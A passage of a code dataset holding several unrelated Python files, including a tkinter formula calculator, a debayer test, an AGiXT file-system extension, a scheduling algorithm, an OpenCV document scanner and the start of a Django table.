text_var.set(\"Download abgeschlossen.\")\r\n fenster.update()\r\n fenster.after(5000,fenster.destroy)\r\n\r\n fenster = Tk()\r\n fenster.config(bg=\"#3b3b3b\")\r\n text_var = StringVar()\r\n text_var.set(\"Fehlende Daten downloaden?\")\r\n ttk.Label(fenster,textvariable=text_var).grid(column=0,row=0,pady=4,padx=4)\r\n ttk.Button(fenster,text=\"Download\",command=download).grid(column=0,row=1,pady=4,padx=4)\r\n\r\ndef ft():\r\n \r\n### Quadratic formula window ### \r\n \r\n def qf():\r\n def loesen():\r\n \r\n labelErgebnis = tk.Label(master=framel, text=\"\")\r\n labelErgebnis.pack(side=\"right\", padx=5, pady=5)\r\n labelErgebnis2 = tk.Label(master=framel2, text=\"\")\r\n labelErgebnis2.pack(side=\"right\", padx=5, pady=5)\r\n labelE2 = tk.Label(master=framel2, text=\"Nst. x2:\", bg=\"#3b3b3b\", fg=\"white\")\r\n labelE2.pack(padx=5, pady=5)\r\n label = tk.Label(master=framel, text=\"Nst. 
x1:\", bg=\"#3b3b3b\", fg=\"white\")\r\n label.pack(padx=5, pady=5)\r\n \r\n try: \r\n a = int(entry1.get())\r\n b = int(entry2.get())\r\n c = int(entry3.get())\r\n \r\n ### Nullstelle ###\r\n \r\n x1 = (-b-math.sqrt(b**2-4*a*c)) / (2*a)\r\n x1 = round(x1, 2)\r\n x2 = (-b+math.sqrt(b**2-4*a*c)) / (2*a)\r\n x2 = round(x2, 2)\r\n labelErgebnis.config(text=str(x1))\r\n labelErgebnis2.config(text=str(x2))\r\n \r\n ### Symetrie ###\r\n \r\n \r\n ### Bildung Graph ###\r\n x = np.linspace(-5,5,60)\r\n y = a*x**2+b*x+c\r\n \r\n plt.xlabel(\"x-Achse\")\r\n plt.ylabel(\"y-Achse\")\r\n plt.title(str(a) + \"x^2 +\" + str(b) + \"x +\" + str(c))\r\n plt.grid(True)\r\n plt.plot(x,y)\r\n plt.show()\r\n \r\n except ValueError:\r\n labelErgebnis.config(text=\"Fehler, Ungültige Werte\")\r\n labelErgebnis2.config(text=\"Fehler, Ungültige Werte\")\r\n def back_qf():\r\n window_ft.deiconify()\r\n window_qf.destroy()\r\n \r\n window_qf = tk.Toplevel(window)\r\n window_qf.title(\"Recht. Dreieck\")\r\n window_qf.config(bg=\"#CDC9C9\")\r\n window.withdraw()\r\n \r\n frame1 = tk.Frame(master=window_qf, bg=\"#CDC9C9\")\r\n frame1.pack(side=\"top\")\r\n frameba = tk.Frame(master=frame1, bg=\"#CDC9C9\")\r\n frameba.pack(side=\"bottom\")\r\n framel2 = tk.Frame(master=frame1, bg=\"#3b3b3b\")\r\n framel2.pack(side=\"bottom\", padx=5, pady=5)\r\n framel = tk.Frame(master=frame1, bg=\"#3b3b3b\")\r\n framel.pack(side=\"bottom\", padx=5, pady=5)\r\n button = tk.Button(master=frame1, text=\"Lösen\", command=loesen, bg=\"#303030\", fg=\"white\")\r\n button.pack(side=\"bottom\", padx=5, pady=5)\r\n framec = tk.Frame(master=frame1, bg=\"#BABABA\")\r\n framec.pack(side=\"bottom\")\r\n frameb = tk.Frame(master=frame1, bg=\"#BABABA\")\r\n frameb.pack(side=\"bottom\")\r\n framea = tk.Frame(master=frame1, bg=\"#BABABA\")\r\n framea.pack(side=\"bottom\")\r\n \r\n label1 = tk.Label(master=frame1, text=\"f(x)=ax^2+bx+c\", bg=\"#3b3b3b\", fg=\"white\")\r\n label1.pack(padx=5, pady=5)\r\n \r\n label2 = tk.Label(master=framea, text=\"a\", bg=\"#3b3b3b\", fg=\"white\")\r\n label2.pack(side=\"left\", padx=5, pady=5)\r\n entry1 = tk.Entry(master=framea)\r\n entry1.pack(padx=5, pady=5)\r\n \r\n label3 = tk.Label(master=frameb, text=\"b\", bg=\"#3b3b3b\", fg=\"white\")\r\n label3.pack(side=\"left\", padx=5, pady=5)\r\n entry2 = tk.Entry(master=frameb)\r\n entry2.pack(padx=5, pady=5)\r\n \r\n label4 = tk.Label(master=framec, text=\"c\", bg=\"#3b3b3b\", fg=\"white\")\r\n label4.pack(side=\"left\", padx=5, pady=5)\r\n entry3 = tk.Entry(master=framec)\r\n entry3.pack(padx=5, pady=5)\r\n \r\n button_back = tk.Button(master=frameba, text=\"Back\", command=back_qf, bg=\"#666666\", fg=\"white\")\r\n button_back.pack(padx=5, pady=5)\r\n \r\n def back():\r\n window.deiconify()\r\n window_ft.destroy()\r\n\r\n### Lineare Funktion Fenster ###\r\n\r\n def lft():\r\n def back_lft():\r\n window_ft.deiconify()\r\n window_lft.destroy()\r\n \r\n def loesen():\r\n try:\r\n framehl = tk.Frame(master=frame1)\r\n framehl.pack(side=\"bottom\")\r\n frame5 = tk.Frame(master=frame1, bg=\"#3b3b3b\")\r\n frame5.pack(side=\"bottom\",padx=5, pady=5, fill=\"both\")\r\n frame4 = tk.Frame(master=frame1, bg=\"#3b3b3b\")\r\n frame4.pack(side=\"bottom\",padx=5, pady=5, fill=\"both\")\r\n label6 = tk.Label(master=frame5, text=\"Monotonie:\", bg=\"#3b3b3b\", fg=\"white\")\r\n label6.pack(side=\"left\", padx=5, pady=5)\r\n label7 = tk.Label(master=frame5, text=\"\")\r\n label7.pack(padx=5, pady=5)\r\n label5 = tk.Label(master=frame4, text=\"Nulstelle:\", bg=\"#3b3b3b\", 
fg=\"white\")\r\n label5.pack(side=\"left\",padx=5, pady=5)\r\n label4 = tk.Label(master=frame4, text=\"\")\r\n label4.pack(padx=5, pady=5)\r\n \r\n m = int(entryA.get())\r\n n = int(entryB.get())\r\n \r\n ### Nullstelle ###\r\n x1 = -(n/m)\r\n x1 = round(x1, 2)\r\n label4.configure(text=x1)\r\n \r\n ### Monotonie m ###\r\n sm = n/m\r\n if sm > 0:\r\n label7.config(text=\"Steigt\")\r\n elif sm < 0:\r\n label7.config(text=\"Fällt\")\r\n \r\n ### Bildung Graph ###\r\n x = np.linspace(-5,5,60)\r\n y = m*x+n\r\n \r\n plt.xlabel(\"x-Achse\")\r\n plt.ylabel(\"y-Achse\")\r\n plt.title(str(m) + \"*x + \" + str(n))\r\n plt.grid(True)\r\n plt.plot(x,y)\r\n plt.show()\r\n \r\n except ValueError:\r\n label4.config(text=\"Fehler, Ungültiger Wert\")\r\n \r\n \r\n window_lft = tk.Toplevel(window)\r\n window_lft.title(\"Lineare Funktion\")\r\n window_lft.config(bg=\"#CDC9C9\")\r\n window_lft.resizable(False, False)\r\n window_ft.withdraw\r\n \r\n \r\n framef = tk.Frame(master=window_lft, bg=\"#CDC9C9\")\r\n framef.pack(side=\"top\")\r\n frame2 = tk.Frame(master=window_lft, bg=\"#BABABA\")\r\n frame2.pack(side=\"top\", fill=\"both\")\r\n frame3 = tk.Frame(master=window_lft, bg=\"#BABABA\")\r\n frame3.pack(side=\"top\", fill=\"both\")\r\n frame1 = tk.Frame(master=window_lft, bg=\"#CDC9C9\")\r\n frame1.pack(side=\"top\")\r\n frame5 = tk.Frame(master=frame1, bg=\"#CDC9C9\")\r\n frame5.pack(side=\"top\")\r\n frameba = tk.Frame(master=frame1, bg=\"#CDC9C9\")\r\n frameba.pack(side=\"bottom\")\r\n \r\n \r\n labelf = tk.Label(master=framef, text=\"f(x)=mx+n\", bg=\"#3b3b3b\", fg=\"white\")\r\n labelf.pack(padx=5, pady=5)\r\n \r\n label1 = tk.Label(master=frame2, text=\"m\", bg=\"#3b3b3b\", fg=\"white\")\r\n label1.pack(side=\"left\",padx=5, pady=5)\r\n \r\n entryA = tk.Entry(master=frame2)\r\n entryA.pack(side=\"top\",padx=5, pady=5)\r\n \r\n label2 = tk.Label(master=frame3, text=\"n\", bg=\"#3b3b3b\", fg=\"white\")\r\n label2.pack(side=\"left\",padx=5, pady=5, expand=True, fill=\"both\")\r\n\r\n entryB = tk.Entry(master=frame3)\r\n entryB.pack(side=\"top\",padx=5, pady=5)\r\n \r\n button = tk.Button(master=frame5, text=\"Lösen\", bg=\"#303030\", fg=\"white\", command=loesen)\r\n button.pack(padx=5, pady=5)\r\n \r\n\r\n \r\n button_back = tk.Button(master=frameba , text=\"Back\", command=back_lft, bg=\"#666666\", fg=\"white\")\r\n button_back.pack(padx=5, pady=5)\r\n\r\n### Funktionen Fenster Main ###\r\n\r\n window_ft = tk.Toplevel(window)\r\n window_ft.title(\"Funktionen\")\r\n window_ft.config(bg=\"#CDC9C9\")\r\n window.withdraw()\r\n \r\n frame1 = tk.Frame(master=window_ft, bg=\"#CDC9C9\")\r\n frame1.pack(side=\"top\")\r\n \r\n lft_button = tk.Button(master=frame1, text=\"Lineare Funktion\", command=lft, bg=\"#303030\", fg=\"white\")\r\n lft_button.pack(side=\"top\", padx=8, pady=8, fill=\"both\")\r\n qf_button = tk.Button(master=frame1, text=\"Quadratische Funktion\", command=qf, bg=\"#303030\", fg=\"white\")\r\n qf_button.pack(side=\"top\",padx=8, pady=8, fill=\"both\")\r\n button = tk.Button(master=frame1, text=\"Back\", command=back, bg=\"#666666\", fg=\"white\")\r\n button.pack(padx=10, pady=5)\r\n\r\n### Quersumme Fenster ###\r\n\r\ndef qs():\r\n def loesen():\r\n try:\r\n number = entry.get()\r\n qs_l = sum([int(i) for i in number])\r\n labelErgebnis.config(text=qs_l)\r\n except ValueError:\r\n labelErgebnis.config(text=\"Fehler, Ungültige Werte\")\r\n def back():\r\n window.deiconify()\r\n window_qs.destroy()\r\n \r\n window_qs = tk.Toplevel(window)\r\n window_qs.title(\"Quersumme\")\r\n 
window_qs.config(bg=\"#CDC9C9\")\r\n window.withdraw()\r\n \r\n frame1 = tk.Frame(master=window_qs, bg=\"#CDC9C9\")\r\n frame1.pack(side=\"top\")\r\n frame3 = tk.Frame(master=frame1, bg=\"#CDC9C9\")\r\n frame3.pack(side=\"bottom\")\r\n frame2 = tk.Frame(master=frame1, bg=\"#3b3b3b\")\r\n frame2.pack(side=\"bottom\", padx=5, pady=5)\r\n \r\n entry = tk.Entry(master=frame1)\r\n entry.pack(padx=10, pady=5)\r\n \r\n button = tk.Button(master=frame3, text=\"Back\", command=back, bg=\"#666666\", fg=\"white\")\r\n button.pack(padx=10, pady=5, side=\"top\")\r\n \r\n button = tk.Button(master=frame1, text=\"Lösen\", command=loesen, bg=\"#303030\", fg=\"white\")\r\n button.pack(padx=5, pady=5)\r\n \r\n labelErgebnis = tk.Label(master=frame2, text=\"\")\r\n labelErgebnis.pack(side=\"right\", padx=5, pady=5)\r\n label = tk.Label(master=frame2, text=\"Ergebnis:\", bg=\"#3b3b3b\", fg=\"white\")\r\n label.pack(padx=5, pady=5)\r\n\r\n### Main Window ###\r\n \r\nwindow = tk.Tk()\r\nwindow.title(\"Formel Rechner\")\r\nwindow.resizable(False, False)\r\n\r\nmainFrame = tk.Frame(master=window, bg=\"#CDC9C9\") # default background colour\r\nmainFrame.pack(side=\"top\")\r\n\r\nqs_button = tk.Button(master=mainFrame, text=\"Quersumme\", command=qs, bg=\"#303030\", fg=\"white\")\r\nqs_button.pack(side=\"top\", padx=8, pady=8, fill=\"both\")\r\n\r\nqua_formel = tk.Button(master=mainFrame, text=\"Funktionen\", command=ft, bg=\"#303030\", fg=\"white\")\r\nqua_formel.pack(side=\"top\", padx=8, pady=8, fill=\"both\")\r\n\r\ntest = tk.Button(master=mainFrame, text=\"Soon\", bg=\"#303030\", fg=\"white\")\r\ntest.pack(side=\"top\", padx=8, pady=8, fill=\"both\")\r\n\r\nclose_button = tk.Button(master=mainFrame, text=\"Close\", command=window.destroy, bg=\"#666666\", fg=\"white\")\r\nclose_button.pack(padx=10, pady=5)\r\n\r\nwindow.mainloop()","repo_name":"gndre-oj/simple_formula_calculator","sub_path":"simple_formula_calculator.py","file_name":"simple_formula_calculator.py","file_ext":"py","file_size_in_byte":11736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72679754409","text":"import debayer\nimport numpy as np\nimport pytest\nimport torch\n\nColors = [\n (1.0, 0.0, 0.0),\n (0.0, 1.0, 0.0),\n (0.0, 0.0, 1.0),\n]\n\n\ndef _bayer_to_torch(x: np.ndarray, dtype=torch.float32, dev: str = \"cpu\"):\n return torch.tensor(x).to(dtype).unsqueeze(0).unsqueeze(0).to(dev)\n\n\n@pytest.mark.parametrize(\"layout\", debayer.Layout)\n@pytest.mark.parametrize(\"color\", Colors)\n@pytest.mark.parametrize(\n \"klass\", [debayer.Debayer2x2, debayer.Debayer3x3, debayer.Debayer5x5]\n)\ndef test_monochromatic_images(layout, color, klass):\n \"\"\"Algorithms should be able to reconstruct monochromatic bayer images.\"\"\"\n rgb = np.tile(\n np.array(color, dtype=np.float32).reshape(1, 1, -1),\n (6, 8, 1),\n )\n b = _bayer_to_torch(debayer.utils.rgb_to_bayer(rgb, layout=layout))\n r = klass(layout=layout)(b)\n\n # import matplotlib.pyplot as plt\n # plt.imshow(r.squeeze().permute(1, 2, 0).cpu().to(torch.float32).numpy())\n # plt.show()\n assert r.shape == (1, 3, 6, 8)\n assert (r == torch.tensor(color).view(1, -1, 1, 1)).all()\n","repo_name":"cheind/pytorch-debayer","sub_path":"tests/test_debayer.py","file_name":"test_debayer.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"53"} +{"seq_id":"70544263850","text":"import Character as dnd\nimport PySimpleGUI as sg\nimport logging\nimport 
sys\nimport images\nimport configparser\n\nclass Options:\n def __init__(self):\n self.config = configparser.ConfigParser()\n try:\n self.load_options()\n except:\n logging.error('Failed to load preferences!')\n self.mod_size = 'Big'\n self.theme = 'DarkGrey'\n self.save_options()\n sg.theme(self.theme)\n \n def get_options_file(self):\n filename = str(dnd.path) + '\\preferences.ini'\n return filename\n\n def save_options(self):\n self.config['options'] = {'mod_size':self.mod_size,\n 'theme':self.theme}\n filename = self.get_options_file()\n with open(filename, 'w') as configfile:\n self.config.write(configfile)\n logging.info('Options Saved')\n \n def load_options(self):\n self.config.read(self.get_options_file())\n self.mod_size = self.config['options']['mod_size']\n self.theme = self.config['options']['theme']\n \n def change_options(self):\n col1 = [[sg.T('Mod Size')],\n [sg.T('Theme')]\n ]\n col2 = [[sg.Combo(values = ['Big', 'Small'], default_value = self.mod_size, key = 'mod_size')],\n [sg.Combo(values = sg.theme_list(), default_value = self.theme, key = 'theme')]\n ]\n layout = [[sg.Column(col1, element_justification = 'l'), sg.Column(col2, element_justification = 'l')],\n [sg.Button('Save')]\n ]\n window = sg.Window('Options', layout, grab_anywhere=True, resizable=True, icon = images.dragon)\n while True:\n event, values = window.read()\n if event is None:\n break\n if event == 'Save':\n self.mod_size = values['mod_size']\n self.theme = values['theme']\n sg.theme(self.theme)\n self.save_options()\n sg.Popup('Options Saved', icon = images.dragon)\n break\n window.close()","repo_name":"alexteeter/DigitalCharacterSheet","sub_path":"src/options/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13761153683","text":"import math\nimport pandas as pd\nimport numpy as np\nfrom collections import defaultdict\nfrom copy import deepcopy\nfrom algorithms.graph.graph_package.graph import Graph\nfrom algorithms.graph.graph_package.graph_vertex import Vertex\n\n\n\nclass PrecSchedule:\n def __init__(self, file_name=None, graph=None):\n if file_name is not None and graph is not None:\n self.file_name = file_name\n self.fi_list, self.pi_list, self.adj_mat = self.__init_csv()\n self.graph = self.__graph_init(graph)\n self.schedule = self.__lawler()\n # else:\n # self.fi_list, self.pi_list, self.adj_mat = None, None, None\n # self.graph = None\n # self.schedule = None\n\n\n def __init_csv(self):\n data_frame = pd.read_csv(self.file_name)\n data_frame_fi = list(map(lambda x: float(x), data_frame.columns.values))\n data_frame_pi = list(map(lambda x: int(x), data_frame.iloc[0]))\n data_frame_adj_matrix = data_frame.to_numpy()[1:]\n return data_frame_fi, data_frame_pi, data_frame_adj_matrix\n\n def __str__(self):\n return f'{self.file_name}:\\n fi_list: {self.fi_list}\\n pi_list: {self.pi_list}\\n adj_matrix:\\n{self.adj_mat}\\n'\n\n def __graph_init(self, graph):\n mat_graph = defaultdict(dict)\n for i in range(len(self.adj_mat)):\n for j in range(len(self.adj_mat[0])):\n if self.adj_mat[i][j] != 0:\n mat_graph[i][j] = self.adj_mat[i][j]\n print(mat_graph)\n\n for src, neighbors in mat_graph.items():\n for dst in neighbors.keys():\n graph.add_edge(src, dst)\n print(graph)\n return graph\n\n def display_graph(self):\n print(self.graph)\n\n def compute_schedule(self):\n return self.schedule\n\n @staticmethod\n def combine_schedules(first, second, 
connection_mat_file_name):\n df = pd.read_csv(connection_mat_file_name, header=None)\n conn_mat = df.to_numpy()\n combined_mat = PrecSchedule.__concatenate_mats(left=first.adj_mat,\n diagonal=second.adj_mat,\n right=conn_mat)\n combined_fi = first.fi_list + second.fi_list\n combined_pi = first.pi_list + second.pi_list\n\n\n combined = PrecSchedule()\n g = Graph(container='list', directed=True)\n combined.fi_list, combined.pi_list, combined.adj_mat = combined_fi, combined_pi, combined_mat\n combined.graph = combined.__graph_init(g)\n combined.schedule = combined.__lawler()\n\n return combined.schedule\n\n\n @staticmethod\n def __concatenate_mats(left, diagonal, right):\n zeros_pad = np.zeros(shape=(diagonal.shape[0], diagonal.shape[0]), dtype=int)\n upper_mat_combine = np.concatenate((left, right), axis=1)\n lower_mat_combine = np.concatenate((zeros_pad, diagonal), axis=1)\n return np.concatenate((upper_mat_combine, lower_mat_combine))\n\n def __lawler(self):\n graph = deepcopy(self.graph)\n prc_times = self.pi_list.copy()\n p = sum(self.fi_list)\n s = self.graph.get_vertices()\n sched_res = []\n n = len(s)\n\n for k in range(n, 0, -1):\n f_k = math.inf\n taken_job = Vertex(key=-1, idx=0)\n taken_idx = 0\n # find job j in s such that out deg is 0 and fj(p) is minimal\n for idx, job in enumerate(s):\n # check if out degree is 0\n if graph.degree(job.key)[1] == 0:\n if f_k > (self.fi_list[job.key] * p):\n f_k = self.fi_list[job.key] * p\n taken_job = job\n taken_idx = idx\n\n # update given data\n if taken_job.key != -1:\n s.remove(taken_job)\n sched_res.append(taken_job)\n p = p - prc_times[taken_idx]\n prc_times.pop(taken_idx)\n graph.remove_vertex(taken_job.key)\n\n # return the schedule\n return sched_res[::-1]\n\n\nif __name__ == '__main__':\n g_fry = Graph(container='list', directed=True)\n fry = PrecSchedule('data/Fry.csv', g_fry)\n sched_fry = fry.compute_schedule()\n for x in sched_fry:\n print(x.key, end=' ')\n print()\n fry.display_graph()\n\n g_leela = Graph(container='list', directed=True)\n leela = PrecSchedule('data/Leela.csv', g_leela)\n sched_leela = leela.compute_schedule()\n for x in sched_leela:\n print(x.key, end=' ')\n print()\n leela.display_graph()\n\n comb = PrecSchedule.combine_schedules(fry, leela, 'data/Fry_Leela.csv')\n for x in comb:\n print(x.key, end=' ')","repo_name":"shalip91/Algorithms","sub_path":"scheduling/1_prec_fmax__lawler.py","file_name":"1_prec_fmax__lawler.py","file_ext":"py","file_size_in_byte":4733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2810906063","text":"from typing import List\nfrom Extensions import Extensions\nimport os\nimport subprocess\nfrom safeexecute import execute_python_code\nimport logging\nimport re\n\n\nclass file_system(Extensions):\n def __init__(\n self,\n WORKING_DIRECTORY: str = \"./WORKSPACE\",\n WORKING_DIRECTORY_RESTRICTED: bool = True,\n **kwargs,\n ):\n self.WORKING_DIRECTORY = WORKING_DIRECTORY\n self.WORKING_DIRECTORY_RESTRICTED = WORKING_DIRECTORY_RESTRICTED\n if not os.path.exists(self.WORKING_DIRECTORY):\n os.makedirs(self.WORKING_DIRECTORY)\n self.commands = {\n \"Write to File\": self.write_to_file,\n \"Read File\": self.read_file,\n \"Search Files\": self.search_files,\n \"Append to File\": self.append_to_file,\n \"Execute Python File\": self.execute_python_file,\n \"Delete File\": self.delete_file,\n \"Execute Shell\": self.execute_shell,\n \"Indent String for Python Code\": self.indent_string,\n \"Generate Commands Dictionary\": 
self.generate_commands_dict,\n \"Get CSV Preview\": self.get_csv_preview,\n }\n self.WORKING_DIRECTORY = WORKING_DIRECTORY\n\n async def execute_python_file(self, file: str):\n logging.info(f\"Executing file '{file}' in workspace '{self.WORKING_DIRECTORY}'\")\n\n if not file.endswith(\".py\"):\n return \"Error: Invalid file type. Only .py files are allowed.\"\n\n file_path = os.path.join(self.WORKING_DIRECTORY, file)\n\n if not os.path.isfile(file_path):\n return f\"Error: File '{file}' does not exist.\"\n\n if self.we_are_running_in_a_docker_container():\n result = subprocess.run(\n f\"python {file_path}\", capture_output=True, encoding=\"utf8\", shell=True\n )\n if result.returncode == 0:\n return result.stdout\n else:\n return f\"Error: {result.stderr}\"\n with open(file_path, \"r\") as f:\n code = f.read()\n return execute_python_code(code=code, working_directory=self.WORKING_DIRECTORY)\n\n async def execute_shell(self, command_line: str) -> str:\n current_dir = os.getcwd()\n os.chdir(current_dir)\n logging.info(\n f\"Executing command '{command_line}' in working directory '{os.getcwd()}'\"\n )\n result = subprocess.run(command_line, capture_output=True, shell=True)\n output = f\"STDOUT:\\n{result.stdout}\\nSTDERR:\\n{result.stderr}\"\n\n os.chdir(current_dir)\n\n return output\n\n @staticmethod\n def we_are_running_in_a_docker_container() -> bool:\n return os.path.exists(\"/.dockerenv\")\n\n def safe_join(self, base: str, paths) -> str:\n if \"/path/to/\" in paths:\n paths = paths.replace(\"/path/to/\", \"\")\n if str(self.WORKING_DIRECTORY_RESTRICTED).lower() == \"true\":\n new_path = os.path.normpath(os.path.join(base, *paths.split(\"/\")))\n if not os.path.exists(new_path):\n if \".\" not in new_path:\n os.makedirs(new_path)\n else:\n # split into path segments; unpacking the raw string would join single characters\n new_path = os.path.normpath(os.path.join(\"/\", *paths.split(\"/\")))\n if not os.path.exists(new_path):\n os.makedirs(new_path)\n return new_path\n\n async def read_file(self, filename: str) -> str:\n try:\n filepath = self.safe_join(base=self.WORKING_DIRECTORY, paths=filename)\n with open(filepath, \"r\", encoding=\"utf-8\") as f:\n content = f.read()\n return content\n except Exception as e:\n return f\"Error: {str(e)}\"\n\n async def write_to_file(self, filename: str, text: str) -> str:\n try:\n filepath = self.safe_join(base=self.WORKING_DIRECTORY, paths=filename)\n directory = os.path.dirname(filepath)\n if not os.path.exists(directory):\n os.makedirs(directory)\n with open(filepath, \"w\", encoding=\"utf-8\") as f:\n f.write(text)\n return \"File written to successfully.\"\n except Exception as e:\n return f\"Error: {str(e)}\"\n\n async def append_to_file(self, filename: str, text: str) -> str:\n try:\n filepath = self.safe_join(base=self.WORKING_DIRECTORY, paths=filename)\n if not os.path.exists(filepath):\n with open(filepath, \"w\") as f:\n f.write(text)\n else:\n with open(filepath, \"a\") as f:\n f.write(text)\n return \"Text appended successfully.\"\n except Exception as e:\n return f\"Error: {str(e)}\"\n\n async def delete_file(self, filename: str) -> str:\n try:\n filepath = self.safe_join(base=self.WORKING_DIRECTORY, paths=filename)\n os.remove(filepath)\n return \"File deleted successfully.\"\n except Exception as e:\n return f\"Error: {str(e)}\"\n\n async def search_files(self, directory: str) -> List[str]:\n found_files = []\n\n if directory in {\"\", \"/\"}:\n search_directory = self.WORKING_DIRECTORY\n else:\n search_directory = self.safe_join(\n base=self.WORKING_DIRECTORY, paths=directory\n )\n\n for root, _, files in 
os.walk(search_directory):\n for file in files:\n if file.startswith(\".\"):\n continue\n relative_path = os.path.relpath(\n os.path.join(root, file), self.WORKING_DIRECTORY\n )\n found_files.append(relative_path)\n\n return found_files\n\n async def indent_string(self, string: str, indents: int = 1):\n if indents == 1:\n indent = \" \"\n else:\n indent = \" \" * indents\n lines = string.split(\"\\n\")\n indented_lines = [(indent + line) for line in lines]\n indented_string = \"\\n\".join(indented_lines)\n return indented_string\n\n async def generate_commands_dict(self, python_file_content):\n function_names = re.findall(r\"async def (.*?)\\(\", python_file_content)\n commands_dict = {\n f_name.replace(\"_\", \" \"): f\"self.{f_name}\" for f_name in function_names\n }\n commands_string = \"self.commands = {\"\n for key, value in commands_dict.items():\n commands_string += f' \"{key.capitalize()}\": {value},'\n commands_string = commands_string[:-1]\n commands_string += \"}\"\n return commands_string\n\n async def get_csv_preview(self, filename: str):\n # Get first 2 lines of the file\n filepath = self.safe_join(base=self.WORKING_DIRECTORY, paths=filename)\n with open(filepath, \"r\") as f:\n lines = f.readlines()\n lines = lines[:2]\n return lines\n","repo_name":"Josh-XT/AGiXT","sub_path":"agixt/extensions/file_system.py","file_name":"file_system.py","file_ext":"py","file_size_in_byte":6804,"program_lang":"python","lang":"en","doc_type":"code","stars":2174,"dataset":"github-code","pt":"53"} +{"seq_id":"37067219537","text":"def searchMatrix(matrix, target):\n arr = list()\n for index in range(len(matrix)):\n arr.extend(matrix[index])\n\n return searchValue(arr, target)\n\n\ndef searchValue(arr, target):\n if len(arr) == 1 and target == arr[0]:\n return True\n if len(arr) == 1 and target != arr[0]:\n return False\n if len(arr) == 0:\n return False\n\n medium = int(len(arr)/2)\n if target == arr[medium]:\n return True\n else:\n # if target is smaller than arr[medium], recurse on the left half\n if target < arr[medium]:\n return searchValue(arr[:medium], target)\n else:\n return searchValue(arr[medium:], target)\n\n\nmatrix = [\n [1, 3, 5, 7],\n [10, 11, 16, 20],\n [23, 30, 34, 50]\n]\ntarget = 13\n\n\nprint(searchMatrix(matrix, target))\n","repo_name":"junh0328/prepare_algorithm","sub_path":"algo/binary_search_2.py","file_name":"binary_search_2.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20825916719","text":"import cv2 as cv\nimport numpy as np\nfrom joining_images import StackedImages\nwidthImg = 640\nheightImg = 480\nframeWidth = 640 \nframeHeight = 480\ncap = cv.VideoCapture(0)\ncap.set(3, widthImg)\ncap.set(4, heightImg)\n#brightness \ncap.set(10, 150)\n\n\ndef preProcessing(img):\n imgGray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n imgBlur = cv.GaussianBlur(imgGray, (5, 5), 1)\n imgCanny = cv.Canny(imgBlur, 200, 200)\n kernel = np.ones((5, 5))\n imgDila = cv.dilate((imgCanny), kernel, iterations= 2)\n imgThres = cv.erode(imgDila, kernel, iterations=1)\n return imgThres\n\ndef getContours(img):\n biggest = np.array([])\n maxArea = 0\n contours,hierarchy = cv.findContours(img,cv.RETR_EXTERNAL,cv.CHAIN_APPROX_NONE)\n for cnt in contours:\n area = cv.contourArea(cnt)\n if area>1000:\n #cv.drawContours(imgContour, cnt, -1, (255, 0, 0), 3)\n peri = cv.arcLength(cnt,True)\n approx = cv.approxPolyDP(cnt,0.02*peri,True)\n if area >maxArea and len(approx) == 4:\n biggest = approx\n maxArea = area\n 
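# draw the best quadrilateral found so far onto the preview frame; note this call\n        # sits inside the contour loop, so it redraws every iteration -- hoisting it to\n        # just before the return would draw only the final winner\n        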
cv.drawContours(imgContour, biggest, -1, (255, 0, 0), 20)\n return biggest\n\n\ndef reorder(myPoints):\n myPoints = myPoints.reshape((4,2))\n myPointsNew = np.zeros((4,1,2),np.int32)\n add = myPoints.sum(1)\n #print(\"add\", add)\n myPointsNew[0] = myPoints[np.argmin(add)]\n myPointsNew[3] = myPoints[np.argmax(add)]\n diff = np.diff(myPoints,axis=1)\n myPointsNew[1]= myPoints[np.argmin(diff)]\n myPointsNew[2] = myPoints[np.argmax(diff)]\n #print(\"NewPoints\",myPointsNew)\n return myPointsNew\n\n\ndef getWarp(img, biggest):\n biggest = reorder(biggest)\n pts1 = np.float32(biggest)\n pts2 = np.float32([[0, 0], [widthImg, 0], [0, heightImg], [widthImg, heightImg]])\n matrix = cv.getPerspectiveTransform(pts1, pts2)\n imgOutput = cv.warpPerspective(img, matrix, (widthImg, heightImg))\n return imgOutput\n\n\nwhile True:\n success, img = cap.read()\n img = cv.resize(img,(widthImg, heightImg))\n imgContour= img.copy() \n\n imgThres = preProcessing(img)\n stack = StackedImages()\n\n biggest = getContours(imgThres)\n if biggest.size != 0:\n imgWarped = getWarp(img, biggest)\n imageArray = ([img, imgThres], [imgContour, imgWarped])\n else:\n imageArray = ([img, imgThres], [img, img])\n \n si = stack.stackImages(0.6, imageArray)\n cv.imshow(\"warped\", si)\n if(cv.waitKey(1) & 0xFF == ord('q')):\n break\n\n\n ","repo_name":"garymejia/OpenCV","sub_path":"document_scanner.py","file_name":"document_scanner.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8181093006","text":"n = int(input(\"Enter the first number: \"))\n\ndef isPrime(num):\n \"\"\"Returns True if num is prime.\"\"\"\n # check the small primes first; otherwise 2 and 3 would be rejected by the divisibility test below\n if (num == 2) or (num == 3) :\n return True\n if (num == 1) or (num % 2 == 0) or (num % 3 == 0) :\n return False\n\n check_var= 5\n set_var = 2\n\n while check_var * check_var <= num:\n if num % check_var == 0:\n return False\n\n check_var += set_var\n set_var = 6 - set_var\n\n return True\n\nprint(isPrime(n))","repo_name":"GabuTheGreat/GabuTheGreat.github.io","sub_path":"challange/recursion_1.py","file_name":"recursion_1.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25085289658","text":"import django_tables2 as tables\n\nfrom apps.contest.models import ScoreSheet\nfrom apps.project.models import Project\n\n\nclass ProjectTable(tables.Table):\n budget_request_sum = tables.Column(verbose_name=\"Запрашиваемая сумма (руб.)\", orderable=False)\n created_on = tables.Column(verbose_name=\"Дата создания\")\n\n T1 = '''\n {% if record.contest.status == record.contest.ON_EXAM %}\n {{record.title}}\n {% else %}\n {{record.title}}\n {% endif %}\n '''\n title = 